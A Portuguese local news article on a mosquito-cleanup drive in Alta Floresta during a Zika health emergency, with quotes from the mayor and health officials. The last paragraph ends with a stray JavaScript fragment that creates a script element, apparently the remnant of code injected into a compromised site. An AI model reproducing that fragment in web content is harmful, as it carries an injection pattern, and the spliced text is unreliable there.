Capa / Cidades / Mutirão de combate ao mosquito Aedes aegypti começou ontem

Mutirão de combate ao mosquito Aedes aegypti começou ontem

GEDSC DIGITAL CAMERA

Dionéia Martins

Começou ontem,11,no bairro Jardim panorama o mutirão de combate ao mosquito Aedes aegypti, mais conhecido como mosquito da dengue. No inicio da manhã o secretário de Saúde, José Luiz Teixeira, secretário de Infraestutura, Eloi Luiz de Almeida e o prefeito Asiel Bezerra de Araújo estiveram no local acompanhando o inicio dos trabalhos.

Os trabalhos começaram pelo Bairro jardim Panorama, mas todos os bairros receberá o mutirão nos próximos 30 dias. O prefeito Asiel Bezerra disse que o objetivo é controlar o vetor retirando toda a sujeira dos quintais e terrenos baldios para evitar a proliferação do mosquito.

“Peço a todos os moradores fiscalize a sua casa e não deixe formar larva porque quem é atingido somos nós, cada um cada cidadão altaflorestense será atingido se não fizermos o nosso dever de casa, a prefeitura está fazendo a parte dela”, ressaltou o prefeito.

Atendendo uma determinação do Ministério de Saúde, que declarou situação de emergência  em saúde pública, devido aos casos de microcefalia ocasionado pelo vírus Zika, a secretaria de saúde do município montou um plano de emergência para evitar que casos da doença aconteça em Alta Floresta.

O secretário da Saúde José Luiz Teixeira ressaltou a importância desse mutirão.”É importante que os moradores se atentem a esse momento, aproveitem a limpeza e coloquem na frente da residência todo o material que ele tem de lixo seco, o que não pode acontecer é no momento que terminar o mutirão a família colocar alguma coisa a frente da sua residência ai nos não vamos vencer esse inseto”, disse o secretário.

Para facilitar o trabalho de limpeza, a Secretaria de Saúde está disponibilizando embalagens de 200 litros para os moradores ensacar o lixo do quintal, uma camionete da vigilância ambiental fica no bairro durante os trabalhos, o morador que precisar é só pegar no veículo.

O coordenador da Vigilância Ambiental de Alta Floresta, Silvio Cardoso, recomenda que os moradores autorizem os  agentes de endemias  a entrarem no quintal para fazer a vistoria nas propriedades.  Ontem 15 agentes, hoje serão 22 agentes nos bairros Panorama e Renascer realizando o serviço de checagem.

“Agentes estarão passando pelas casas vistoriando quintais, trabalhando a consciência da população, tem também uma equipe que está fazendo a aplicação do inseticida aqui no bairro para que a gente elimine o mosquito adulto que esteja voando”, esclareceu Silvio Cardoso.

Quatro agentes estão trabalhando com o produto químico pulverizando as ruas com as bombas motorizadas.  Para a força tarefa  5 caminhões caçamba, 3 patrol, 2 pá carregadeiras, 1 roçadeira de trator, 6 roçadeiras manual e 30 homens da Secretaria de Infraestrutura estavam no bairro realizando o trabalho de limpeza.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top